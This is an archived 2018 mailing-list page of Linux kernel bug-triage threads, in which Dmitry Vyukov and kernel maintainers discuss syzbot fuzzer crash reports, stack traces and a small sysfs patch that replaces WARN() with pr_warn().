Re: WARNING in kernfs_add_one

2018-05-07 Thread Dmitry Vyukov
On Mon, May 7, 2018 at 10:43 AM, Johannes Berg
 wrote:
> On Sat, 2018-05-05 at 15:07 -0700, Greg KH wrote:
>
>> > > > syzbot found the following crash on:
>
> Maybe it should learn to differentiate warnings, if it's going to set
> panic_on_warn :-)

How?
Note that this is not specific to syzbot. If you see WARNINGs in a
subsystem that you have no idea about (or you are just a normal user),
what do you do? Right, you report it to the maintainers.


> I get why, but still, at least differentiating in the emails wouldn't be
> bad.

Well, the subject says "WARNING".
But note there are _very_ bad WARNINGs too. Generally, a WARNING means
a kernel bug, just one that the kernel can tolerate without bringing the
system down (as opposed to BUG).


>> > > > kernfs: ns required in 'ieee80211' for 'phy3'
>
> Huh. What does that even mean?
>
>> > > > RIP: 0010:kernfs_add_one+0x406/0x4d0 fs/kernfs/dir.c:758
>> > > > RSP: 0018:8801ca9eece0 EFLAGS: 00010286
>> > > > RAX: 002d RBX: 87d5cee0 RCX: 8160ba7d
>> > > > RDX:  RSI: 81610731 RDI: 8801ca9ee840
>> > > > RBP: 8801ca9eed20 R08: 8801d9538500 R09: 0006
>> > > > R10: 8801d9538500 R11:  R12: 8801ad1cb6c0
>> > > > R13: 885da640 R14: 0020 R15: 
>> > > >  kernfs_create_link+0x112/0x180 fs/kernfs/symlink.c:41
>> > > >  sysfs_do_create_link_sd.isra.2+0x90/0x130 fs/sysfs/symlink.c:43
>> > > >  sysfs_do_create_link fs/sysfs/symlink.c:79 [inline]
>> > > >  sysfs_create_link+0x65/0xc0 fs/sysfs/symlink.c:91
>> > > >  device_add_class_symlinks drivers/base/core.c:1612 [inline]
>> > > >  device_add+0x7a0/0x16d0 drivers/base/core.c:1810
>> > > >  wiphy_register+0x178a/0x2430 net/wireless/core.c:806
>> > > >  ieee80211_register_hw+0x13cd/0x35d0 net/mac80211/main.c:1047
>> > > >  mac80211_hwsim_new_radio+0x1d9b/0x3410 drivers/net/wireless/mac80211_hwsim.c:2772
>> > > >  hwsim_new_radio_nl+0x7a7/0xa60 drivers/net/wireless/mac80211_hwsim.c:3246
>> > > >  genl_family_rcv_msg+0x889/0x1120 net/netlink/genetlink.c:599
>
> Basically we're creating a new virtual radio, which in turn creates a
> new device, which we have to register.
>
> Something is going on with the context here that makes sysfs unhappy,
> but TBH I have no idea what.
>
> johannes
>
> --
> You received this message because you are subscribed to the Google Groups 
> "syzkaller-bugs" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to syzkaller-bugs+unsubscr...@googlegroups.com.
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/syzkaller-bugs/1525682589.6049.4.camel%40sipsolutions.net.
> For more options, visit https://groups.google.com/d/optout.


Re: INFO: rcu detected stall in vprintk_default

2018-04-01 Thread Dmitry Vyukov
On Sun, Apr 1, 2018 at 12:50 PM, syzbot
 wrote:
> Hello,
>
> syzbot hit the following crash on upstream commit
> 10b84daddbec72c6b440216a69de9a9605127f7a (Sat Mar 31 17:59:00 2018 +)
> Merge branch 'perf-urgent-for-linus' of
> git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip
> syzbot dashboard link:
> https://syzkaller.appspot.com/bug?extid=19c436b56eaa98e50e98
>
> Unfortunately, I don't have any reproducer for this crash yet.
> Raw console output:
> https://syzkaller.appspot.com/x/log.txt?id=4989667443212288
> Kernel config:
> https://syzkaller.appspot.com/x/.config?id=-2760467897697295172
> compiler: gcc (GCC) 7.1.1 20170620

Seems to be the same as:

#syz dup: INFO: rcu detected stall in vprintk_func

+nfc maintainers


> IMPORTANT: if you fix the bug, please add the following tag to the commit:
> Reported-by: syzbot+19c436b56eaa98e50...@syzkaller.appspotmail.com
> It will help syzbot understand when the bug is fixed. See footer for
> details.
> If you forward the report, please keep this part and the footer.
>
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> INFO: rcu_sched self-detected stall on CPU
> 1-...!: (18264 ticks this GP) idle=37a/1/4611686018427387906
> softirq=28996/28996 fqs=216
>
>  (t=125004 jiffies g=15379 c=15378 q=788)
>
> (detected by 0, t=125004 jiffies, g=15379, c=15378, q=788)
> rcu_sched   R
> CPU: 1 PID: 9892 Comm: syz-executor7 Not tainted 4.16.0-rc7+ #9
> Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
> RIP: 0010:stack_not_used include/linux/sched/task_stack.h:101 [inline]
> RIP: 0010:sched_show_task+0x324/0x5e0 kernel/sched/core.c:5259
> RSP: 0018:8801db107298 EFLAGS: 0046
> RAX: dc00 RBX: 8801d9af8200 RCX: 
> RDX: 11003b3604bd RSI: 11003b620e08 RDI: ed003b620e47
> R10: 885909d0 R11:  R12: 11003b620e55
> R13: 8801d9b025e8 R14: 8801db107388 R15: 8801d9b0
> FS:  7fe826c07700() GS:8801db10() knlGS:
> CS:  0010 DS:  ES:  CR0: 80050033
> DR0:  DR1:  DR2: 
> DR3:  DR6: fffe0ff0 DR7: 0400
> Call Trace:
>  rcu_check_gp_kthread_starvation+0x32d/0x384 kernel/rcu/tree.c:1353
>  update_process_times+0x30/0x60 kernel/time/timer.c:1636
>  tick_sched_handle+0x85/0x160 kernel/time/tick-sched.c:162
>  local_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1025 [inline]
>  smp_apic_timer_interrupt+0x14a/0x700 arch/x86/kernel/apic/apic.c:1050
>  apic_timer_interrupt+0xf/0x20 arch/x86/entry/entry_64.S:857
> RSP: 0018:8801845d74a8 EFLAGS: 0246 ORIG_RAX: ff12
> RAX: 0004 RBX: 110a24ed RCX: 815ae4cf
> RBP: 8801845d7630 R08:  R09: 
> R10:  R11:  R12: 0034
> R13: 8801845d7588 R14: ed00308baeb1 R15: 89db2f40
>  vprintk_default+0x28/0x30 kernel/printk/printk.c:1947
>  printk+0xaa/0xca kernel/printk/printk.c:1980
>  nfc_llcp_send_ui_frame+0x430/0x4e0 net/nfc/llcp_commands.c:758
>  llcp_sock_sendmsg+0x224/0x2f0 net/nfc/llcp_sock.c:790
>  ___sys_sendmsg+0x320/0x8b0 net/socket.c:2046
>  SYSC_sendmmsg net/socket.c:2167 [inline]
>  SyS_sendmmsg+0x35/0x60 net/socket.c:2162
>  do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287
> RIP: 0033:0x454e79
> RSP: 002b:7fe826c06c68 EFLAGS: 0246 ORIG_RAX: 0133
> RDX: 0001 RSI: 2340 RDI: 0014
> RBP: 0072bea0 R08:  R09: 
> R10: 0002 R11: 0246 R12: 
> R13: 04c9 R14: 006f9378 R15: 
> Code: 03 80 3c 02 00 0f 85 6e 02 00 00 4c 8b 7b 40 48 b8 00 00 00 00 00 fc
> ff df 4d 89 fd 49 83 c5 08 4c 89 ea 48 c1 ea 03 80 3c 02 00 <0f> 85 66 02 00
> 00 49 83 7d 00 00 74 e4 4d 29 fd 4c 89 ad f0 fe
> 24368 8  2 0x8000
> Call Trace:
>  context_switch kernel/sched/core.c:2862 [inline]
>  __schedule+0x8fb/0x1ec0 kernel/sched/core.c:3440
> rcu_sched   R  running task
> Call Trace:
>  schedule+0xf5/0x430 kernel/sched/core.c:3499
>  kthread+0x33c/0x400 kernel/kthread.c:238
>  ret_from_fork+0x3a/0x50 arch/x86/entry/entry_64.S:406
> NMI backtrace for cpu 1
>  rcu_gp_kthread+0x9dd/0x18e0 kernel/rcu/tree.c:2230
> Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
> Call Trace:
>  __dump_stack lib/dump_stack.c:17 [inline]
>  dump_stack+0x194/0x24d lib/dump_stack.c:53
>  nmi_trigger_cpumask_backtrace+0x123/0x180 lib/nmi_backtrace.c:62
>  

Re: INFO: rcu detected stall in vprintk_func

2018-04-01 Thread Dmitry Vyukov
On Sun, Apr 1, 2018 at 12:49 PM, syzbot
 wrote:
> Hello,
>
> syzbot hit the following crash on upstream commit
> 3eb2ce825ea1ad89d20f7a3b5780df850e4be274 (Sun Mar 25 22:44:30 2018 +)
> Linux 4.16-rc7
> syzbot dashboard link:
> https://syzkaller.appspot.com/bug?extid=3f28bd18291266ec826b
>
> Unfortunately, I don't have any reproducer for this crash yet.
> Raw console output:
> https://syzkaller.appspot.com/x/log.txt?id=4815791329378304
> Kernel config:
> https://syzkaller.appspot.com/x/.config?id=-2340295454854568752
> compiler: gcc (GCC) 7.1.1 20170620


The problem seems to be in nfc, so +nfc maintainers.


> IMPORTANT: if you fix the bug, please add the following tag to the commit:
> Reported-by: syzbot+3f28bd18291266ec8...@syzkaller.appspotmail.com
> It will help syzbot understand when the bug is fixed. See footer for
> details.
> If you forward the report, please keep this part and the footer.
>
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> INFO: rcu_sched detected stalls on CPUs/tasks:
> (detected by 1, t=125006 jiffies, g=23111, c=23110, q=45)
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> syz-executor1   R  running task24512 13655   4242 0x0008
> Call Trace:
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  print_other_cpu_stall+0x996/0x1090 kernel/rcu/tree.c:1480
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  check_cpu_stall.isra.61+0x6e6/0x15b0 kernel/rcu/tree.c:1598
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  update_process_times+0x30/0x60 kernel/time/timer.c:1636
>  tick_sched_timer+0x42/0x120 kernel/time/tick-sched.c:1194
>  __run_hrtimer kernel/time/hrtimer.c:1349 [inline]
>  __hrtimer_run_queues+0x39c/0xec0 kernel/time/hrtimer.c:1411
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  hrtimer_interrupt+0x2a5/0x6f0 kernel/time/hrtimer.c:1469
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  apic_timer_interrupt+0xf/0x20 arch/x86/entry/entry_64.S:857
> RIP: 0010:arch_local_irq_restore arch/x86/include/asm/paravirt.h:778 [inline]
> RIP: 0010:console_unlock+0xd98/0xfb0 kernel/printk/printk.c:2399
> RAX: 0001 RBX: 0200 RCX: 815a8fef
> RDX: 0001 RSI: c90004937000 RDI: 0246
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> R10:  R11:  R12: dc00
> R13:  R14: 83ba1660 R15: dc00
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  vprintk_func+0x57/0xc0 kernel/printk/printk_safe.c:379
>  printk+0xaa/0xca kernel/printk/printk.c:1980
>  nfc_llcp_send_ui_frame+0x430/0x4e0 net/nfc/llcp_commands.c:758
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  __sys_sendmmsg+0x1ee/0x620 net/socket.c:2136
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  SYSC_sendmmsg net/socket.c:2167 [inline]
>  SyS_sendmmsg+0x35/0x60 net/socket.c:2162
>  do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  entry_SYSCALL_64_after_hwframe+0x42/0xb7
> RSP: 002b:7fdb811c4c68 EFLAGS: 0246 ORIG_RAX: 0133
> RAX: ffda RBX: 7fdb811c56d4 RCX: 00454879
> RBP: 0072bea0 R08:  R09: 
> R10:  R11: 0246 R12: 
> R13: 04c0 R14: 006f82a0 R15: 
> rcu_sched kthread starved for 125907 jiffies! g23111 c23110 f0x2
> RCU_GP_WAIT_FQS(3) ->state=0x0 ->cpu=1
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> rcu_sched   R  running task23448 8  2 0x8000
>  context_switch kernel/sched/core.c:2862 [inline]
>  

Re: WARNING in check_flush_dependency

2018-02-19 Thread Dmitry Vyukov
On Wed, Jan 24, 2018 at 8:39 AM, Johannes Berg
 wrote:
> On Mon, 2018-01-22 at 23:39 -0800, syzbot wrote:
>> Hello,
>>
>> syzbot hit the following crash on upstream commit
>> 0d665e7b109d512b7cae3ccef6e8654714887844 (Fri Jan 19 12:49:24 2018 +)
>> mm, page_vma_mapped: Drop faulty pointer arithmetics in check_pte()
>>
>> So far this crash happened 23 times on net-next, upstream.
>> C reproducer is attached.
>> syzkaller reproducer is attached.
>> Raw console output is attached.
>> compiler: gcc (GCC) 7.1.1 20170620
>> .config is attached.
>> user-space arch: i386
>>
>> IMPORTANT: if you fix the bug, please add the following tag to the commit:
>> Reported-by: syzbot+41cdaf4232c50e658...@syzkaller.appspotmail.com
>> It will help syzbot understand when the bug is fixed. See footer for
>> details.
>> If you forward the report, please keep this part and the footer.
>>
>> [ cut here ]
>> workqueue: WQ_MEM_RECLAIM hwsim_wq:destroy_radio is
>> flushing !WQ_MEM_RECLAIM events_highpri:flush_backlog
>> WARNING: CPU: 0 PID: 3706 at kernel/workqueue.c:2439
>> check_flush_dependency+0x239/0x380 kernel/workqueue.c:2435
>> Kernel panic - not syncing: panic_on_warn set ...
>
> Yeah, we clearly shouldn't have WQ_RECLAIM set on this workqueue...

Hi Johannes,

Would you mind sending a patch to fix this?


Re: WARNING in sysfs_warn_dup

2018-01-22 Thread Dmitry Vyukov
On Mon, Jan 22, 2018 at 3:45 PM, Greg KH <gre...@linuxfoundation.org> wrote:
> On Mon, Jan 22, 2018 at 03:30:12PM +0100, Dmitry Vyukov wrote:
>> On Mon, Jan 22, 2018 at 3:00 PM, Greg KH <gre...@linuxfoundation.org> wrote:
>> > On Mon, Jan 22, 2018 at 02:47:33PM +0100, Dmitry Vyukov wrote:
>> >> On Tue, Dec 19, 2017 at 10:06 AM, Dmitry Vyukov <dvyu...@google.com> 
>> >> wrote:
>> >> > On Tue, Dec 19, 2017 at 10:03 AM, Dmitry Vyukov <dvyu...@google.com> 
>> >> > wrote:
>> >> >>
>> >> >> On Tue, Dec 19, 2017 at 10:01 AM, Greg KH <gre...@linuxfoundation.org> 
>> >> >> wrote:
>> >> >>>
>> >> >>> On Mon, Dec 18, 2017 at 08:57:01AM -0800, syzbot wrote:
>> >> >>> > Hello,
>> >> >>> >
>> >> >>> > syzkaller hit the following crash on
>> >> >>> > 6084b576dca2e898f5c101baef151f7bfdbb606d
>> >> >>> > git://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/master
>> >> >>> > compiler: gcc (GCC) 7.1.1 20170620
>> >> >>> > .config is attached
>> >> >>> > Raw console output is attached.
>> >> >>> >
>> >> >>> > Unfortunately, I don't have any reproducer for this bug yet.
>> >> >>> >
>> >> >>> >
>> >> >>> > netlink: 9 bytes leftover after parsing attributes in process
>> >> >>> > `syz-executor3'.
>> >> >>> > sg_write: data in/out 822404280/197 bytes for SCSI command 0x12-- 
>> >> >>> > guessing
>> >> >>> > data in;
>> >> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >> >>> > sg_write: data in/out 262364/161 bytes for SCSI command 0xff-- 
>> >> >>> > guessing data
>> >> >>> > in;
>> >> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >> >>> > WARNING: CPU: 1 PID: 22282 at fs/sysfs/dir.c:31 
>> >> >>> > sysfs_warn_dup+0x60/0x80
>> >> >>> > fs/sysfs/dir.c:30
>> >> >>> > Kernel panic - not syncing: panic_on_warn set ...
>> >> >>>
>> >> >>> Looks like a networking issue, it tried to create two sysfs 
>> >> >>> directories
>> >> >>> with the same name, which isn't a sysfs bug :)
>> >> >
>> >> >
>> >> > Now as plain text:
>> >> >
>> >> > +net/core/dev.c maintainers
>> >>
>> >>
>> >> Also happens for wiphy_register (on upstream
>> >> a8750ddca918032d6349adbf9a4b6555e7db20da):
>> >>
>> >> [ cut here ]
>> >> sysfs: cannot create duplicate filename
>> >> '/class/ieee80211/š§"­ût{§Ô­ðô Š!× ž 7… Š†õiùS6 È< »þ {_CK5äá   ×ÝÊmô Be'
>> >
>> > That's a wonderful filename :)
>> >
>> >> WARNING: CPU: 1 PID: 8233 at fs/sysfs/dir.c:31
>> >> sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
>> >
>> > As this is just sysfs saying "Hey dummy, you are trying to do something
>> > foolish here", what would be the better thing for it to do?
>> >
>> > Just printk(KERN_WARNING...) and then dump the stack?
>> >
>> > It seems the WARN_ON() that is currently being used is being treated as
>> > an "error" by your testing, when really it isn't, unless the caller can
>> > not handle the error being passed back up to it by the sysfs core.
>> > Which it should, but I don't think you are even giving it the chance as
>> > you are:
>> >
>> >> Kernel panic - not syncing: panic_on_warn set ...
>> >
>> > Yup, panic_on_warn :(
>> >
>> > ideas to make this easier for you?
>>
>>
>> pr_warn or pr_warn_once (optionally followed by dump_stack) would work
>> for syzbot.
>
> This shouldn't be a _once() call, as it is called by things all over the
> kernel, all with unique paths.
>
> I'll go make up a patch for this, thanks.

#syz fix: sysfs: turn WARN() into pr_warn()


Re: [PATCH] sysfs: turn WARN() into pr_warn()

2018-01-22 Thread Dmitry Vyukov
On Mon, Jan 22, 2018 at 3:57 PM, Greg KH <gre...@linuxfoundation.org> wrote:
> From: Greg Kroah-Hartman <gre...@linuxfoundation.org>
>
> It's not good to crash the machine if panic_on_warn() is set just
> because someone made a stupid mistake of trying to create a sysfs file
> with the same name of an existing one.  This makes the automated testing
> tools a lot harder to find the real bugs in the kernel.
>
> So just print a warning out and dump the stack to get the attention of
> the developer that they did something foolish.  Then keep on trucking,
> as this should not be a fatal error at all.
>
> Reported-by: Dmitry Vyukov <dvyu...@google.com>
> Signed-off-by: Greg Kroah-Hartman <gre...@linuxfoundation.org>
> ---
>
> Dmitry, does this look good to you?  If so, I'll queue it up for
> 4.16-rc1.

Perfect! Looks good. syzbot reacts to the "WARNING:" string (and a
kernel panic due to panic_on_warn is, of course, also treated as a problem).

> diff --git a/fs/sysfs/dir.c b/fs/sysfs/dir.c
> index 2b67bda2021b..3a36a48a4b3f 100644
> --- a/fs/sysfs/dir.c
> +++ b/fs/sysfs/dir.c
> @@ -10,6 +10,7 @@
>   * Please see Documentation/filesystems/sysfs.txt for more information.
>   */
>
> +#define pr_fmt(fmt)	"sysfs: " fmt
>  #undef DEBUG
>
>  #include 
> @@ -27,8 +28,8 @@ void sysfs_warn_dup(struct kernfs_node *parent, const char *name)
>  	if (buf)
>  		kernfs_path(parent, buf, PATH_MAX);
>  
> -	WARN(1, KERN_WARNING "sysfs: cannot create duplicate filename '%s/%s'\n",
> -	     buf, name);
> +	pr_warn("cannot create duplicate filename '%s/%s'\n", buf, name);
> +	dump_stack();
>  
>  	kfree(buf);
>  }


Re: WARNING in sysfs_warn_dup

2018-01-22 Thread Dmitry Vyukov
On Mon, Jan 22, 2018 at 3:00 PM, Greg KH <gre...@linuxfoundation.org> wrote:
> On Mon, Jan 22, 2018 at 02:47:33PM +0100, Dmitry Vyukov wrote:
>> On Tue, Dec 19, 2017 at 10:06 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
>> > On Tue, Dec 19, 2017 at 10:03 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
>> >>
>> >> On Tue, Dec 19, 2017 at 10:01 AM, Greg KH <gre...@linuxfoundation.org> 
>> >> wrote:
>> >>>
>> >>> On Mon, Dec 18, 2017 at 08:57:01AM -0800, syzbot wrote:
>> >>> > Hello,
>> >>> >
>> >>> > syzkaller hit the following crash on
>> >>> > 6084b576dca2e898f5c101baef151f7bfdbb606d
>> >>> > git://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/master
>> >>> > compiler: gcc (GCC) 7.1.1 20170620
>> >>> > .config is attached
>> >>> > Raw console output is attached.
>> >>> >
>> >>> > Unfortunately, I don't have any reproducer for this bug yet.
>> >>> >
>> >>> >
>> >>> > netlink: 9 bytes leftover after parsing attributes in process
>> >>> > `syz-executor3'.
>> >>> > sg_write: data in/out 822404280/197 bytes for SCSI command 0x12-- 
>> >>> > guessing
>> >>> > data in;
>> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >>> > sg_write: data in/out 262364/161 bytes for SCSI command 0xff-- 
>> >>> > guessing data
>> >>> > in;
>> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >>> > WARNING: CPU: 1 PID: 22282 at fs/sysfs/dir.c:31 
>> >>> > sysfs_warn_dup+0x60/0x80
>> >>> > fs/sysfs/dir.c:30
>> >>> > Kernel panic - not syncing: panic_on_warn set ...
>> >>>
>> >>> Looks like a networking issue, it tried to create two sysfs directories
>> >>> with the same name, which isn't a sysfs bug :)
>> >
>> >
>> > Now as plain text:
>> >
>> > +net/core/dev.c maintainers
>>
>>
>> Also happens for wiphy_register (on upstream
>> a8750ddca918032d6349adbf9a4b6555e7db20da):
>>
>> [ cut here ]
>> sysfs: cannot create duplicate filename
>> '/class/ieee80211/š§"­ût{§Ô­ðô Š!× ž 7… Š†õiùS6 È< »þ {_CK5äá   ×ÝÊmô Be'
>
> That's a wonderful filename :)
>
>> WARNING: CPU: 1 PID: 8233 at fs/sysfs/dir.c:31
>> sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
>
> As this is just sysfs saying "Hey dummy, you are trying to do something
> foolish here", what would be the better thing for it to do?
>
> Just printk(KERN_WARNING...) and then dump the stack?
>
> It seems the WARN_ON() that is currently being used is being treated as
> an "error" by your testing, when really it isn't, unless the caller can
> not handle the error being passed back up to it by the sysfs core.
> Which it should, but I don't think you are even giving it the chance as
> you are:
>
>> Kernel panic - not syncing: panic_on_warn set ...
>
> Yup, panic_on_warn :(
>
> ideas to make this easier for you?


pr_warn or pr_warn_once (optionally followed by dump_stack) would work
for syzbot.

Thanks!


Re: WARNING in sysfs_warn_dup

2018-01-22 Thread Dmitry Vyukov
On Tue, Dec 19, 2017 at 10:06 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
> On Tue, Dec 19, 2017 at 10:03 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
>>
>> On Tue, Dec 19, 2017 at 10:01 AM, Greg KH <gre...@linuxfoundation.org> wrote:
>>>
>>> On Mon, Dec 18, 2017 at 08:57:01AM -0800, syzbot wrote:
>>> > Hello,
>>> >
>>> > syzkaller hit the following crash on
>>> > 6084b576dca2e898f5c101baef151f7bfdbb606d
>>> > git://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/master
>>> > compiler: gcc (GCC) 7.1.1 20170620
>>> > .config is attached
>>> > Raw console output is attached.
>>> >
>>> > Unfortunately, I don't have any reproducer for this bug yet.
>>> >
>>> >
>>> > netlink: 9 bytes leftover after parsing attributes in process
>>> > `syz-executor3'.
>>> > sg_write: data in/out 822404280/197 bytes for SCSI command 0x12-- guessing
>>> > data in;
>>> >program syz-executor0 not setting count and/or reply_len properly
>>> > sg_write: data in/out 262364/161 bytes for SCSI command 0xff-- guessing 
>>> > data
>>> > in;
>>> >program syz-executor0 not setting count and/or reply_len properly
>>> > WARNING: CPU: 1 PID: 22282 at fs/sysfs/dir.c:31 sysfs_warn_dup+0x60/0x80
>>> > fs/sysfs/dir.c:30
>>> > Kernel panic - not syncing: panic_on_warn set ...
>>>
>>> Looks like a networking issue, it tried to create two sysfs directories
>>> with the same name, which isn't a sysfs bug :)
>
>
> Now as plain text:
>
> +net/core/dev.c maintainers


Also happens for wiphy_register (on upstream
a8750ddca918032d6349adbf9a4b6555e7db20da):

[ cut here ]
sysfs: cannot create duplicate filename
'/class/ieee80211/š§"­ût{§Ô­ðô Š!× ž 7… Š†õiùS6 È< »þ {_CK5äá   ×ÝÊmô Be'
WARNING: CPU: 1 PID: 8233 at fs/sysfs/dir.c:31 sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 8233 Comm: syz-executor7 Not tainted 4.15.0-rc8+ #263
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
 __dump_stack lib/dump_stack.c:17 [inline]
 dump_stack+0x194/0x257 lib/dump_stack.c:53
 panic+0x1e4/0x41c kernel/panic.c:183
 __warn+0x1dc/0x200 kernel/panic.c:547
 report_bug+0x211/0x2d0 lib/bug.c:184
 fixup_bug.part.11+0x37/0x80 arch/x86/kernel/traps.c:178
 fixup_bug arch/x86/kernel/traps.c:247 [inline]
 do_error_trap+0x2d7/0x3e0 arch/x86/kernel/traps.c:296
 do_invalid_op+0x1b/0x20 arch/x86/kernel/traps.c:315
 invalid_op+0x22/0x40 arch/x86/entry/entry_64.S:1085
RIP: 0010:sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
RSP: 0018:8801d00def20 EFLAGS: 00010286
RAX: dc08 RBX: 8801c4ff2ac0 RCX: 8159dade
RDX: cb4f RSI: c9000192b000 RDI: 8801d00dec28
RBP: 8801d00def38 R08: 11003a01bd61 R09: 
R10:  R11:  R12: 8801d976fa80
R13: 8801d833e380 R14: 0001 R15: ffef
 sysfs_do_create_link_sd.isra.2+0xf3/0x110 fs/sysfs/symlink.c:51
 sysfs_do_create_link fs/sysfs/symlink.c:80 [inline]
 sysfs_create_link+0x65/0xc0 fs/sysfs/symlink.c:92
 device_add_class_symlinks drivers/base/core.c:1603 [inline]
 device_add+0x74a/0x1650 drivers/base/core.c:1801
 wiphy_register+0x1468/0x2050 net/wireless/core.c:800
 ieee80211_register_hw+0x1162/0x3100 net/mac80211/main.c:1038
 mac80211_hwsim_new_radio+0x1b2e/0x2b90 drivers/net/wireless/mac80211_hwsim.c:2700
 hwsim_new_radio_nl+0x5b7/0x7c0 drivers/net/wireless/mac80211_hwsim.c:3152
 genl_family_rcv_msg+0x7b7/0xfb0 net/netlink/genetlink.c:599
 genl_rcv_msg+0xb2/0x140 net/netlink/genetlink.c:624
 netlink_rcv_skb+0x224/0x470 net/netlink/af_netlink.c:2408
 genl_rcv+0x28/0x40 net/netlink/genetlink.c:635
 netlink_unicast_kernel net/netlink/af_netlink.c:1275 [inline]
 netlink_unicast+0x4ee/0x700 net/netlink/af_netlink.c:1301
 netlink_sendmsg+0xa4a/0xe60 net/netlink/af_netlink.c:1864
 sock_sendmsg_nosec net/socket.c:638 [inline]
 sock_sendmsg+0xca/0x110 net/socket.c:648
 ___sys_sendmsg+0x767/0x8b0 net/socket.c:2028
 __sys_sendmsg+0xe5/0x210 net/socket.c:2062
 SYSC_sendmsg net/socket.c:2073 [inline]
 SyS_sendmsg+0x2d/0x50 net/socket.c:2069
 entry_SYSCALL_64_fastpath+0x29/0xa0



If you fix this, please add the following tag:
Reported-by: syzbot+1fdad4e2731bf0c1bc19953ccc5061237ec92...@syzkaller.appspotmail.com
It will help syzbot understand when the bug is fixed.


Re: WARNING in rfkill_alloc

2018-01-15 Thread Dmitry Vyukov
On Mon, Jan 15, 2018 at 1:01 PM, Johannes Berg
<johan...@sipsolutions.net> wrote:
> On Mon, 2018-01-15 at 10:12 +0100, Dmitry Vyukov wrote:
>
>> However, there can be some surprising things, for example, executing
>> one ioctl/setsockopt with data meant for another one, or these
>> 0x are actually mean 0 (for involved reasons),
>
> I think those fff was actually what was throwing me off.
>
>> or we
>> can simply have bugs in these descriptions so they don't match C
>> structures and then all data is messed/shifted.
>
> No, I think this part was OK.
>
>> If this representation does not make sense to you right away, your
>> best bet is looking at/running the C reproducer where you can see true
>> data layout:
>>
>>
> [...]
> Yeah, good point, I should've just done that.
>
>> > Ah, then again, now I see the fault injection - I guess dev_set_name()
>> > just failed and we didn't check the return value, will fix that.
>>
>> Yes, it's highly likely the root cause. The raw.log file shows there
>> there was an immediately preceding fault in kmalloc in the same
>> process, in a close stack.
>
> Yep, I submitted the fix now (with the correct reported-by).
>
> Also for the other one, the wiphy_register() warning.

Thanks!


Re: WARNING in rfkill_alloc

2018-01-15 Thread Dmitry Vyukov
On Mon, Jan 15, 2018 at 9:57 AM, Johannes Berg
 wrote:
> Hi,
>
>> RIP: 0010:rfkill_alloc+0x2c0/0x380 net/rfkill/core.c:930
>
> This seems pretty obvious - there's no name given.
>
>>   wiphy_new_nm+0x159c/0x21d0 net/wireless/core.c:487
>>   ieee80211_alloc_hw_nm+0x4b4/0x2140 net/mac80211/main.c:531
>
> which is strange, because we try to validate the name here.
>
> Can you help me read this?
>
> sendmsg$nl_generic(r1, &(0x7fb3e000-0x38)={&(0x7fd4a000-
> 0xc)={0x10, 0x0, 0x0, 0x0}, 0xc,
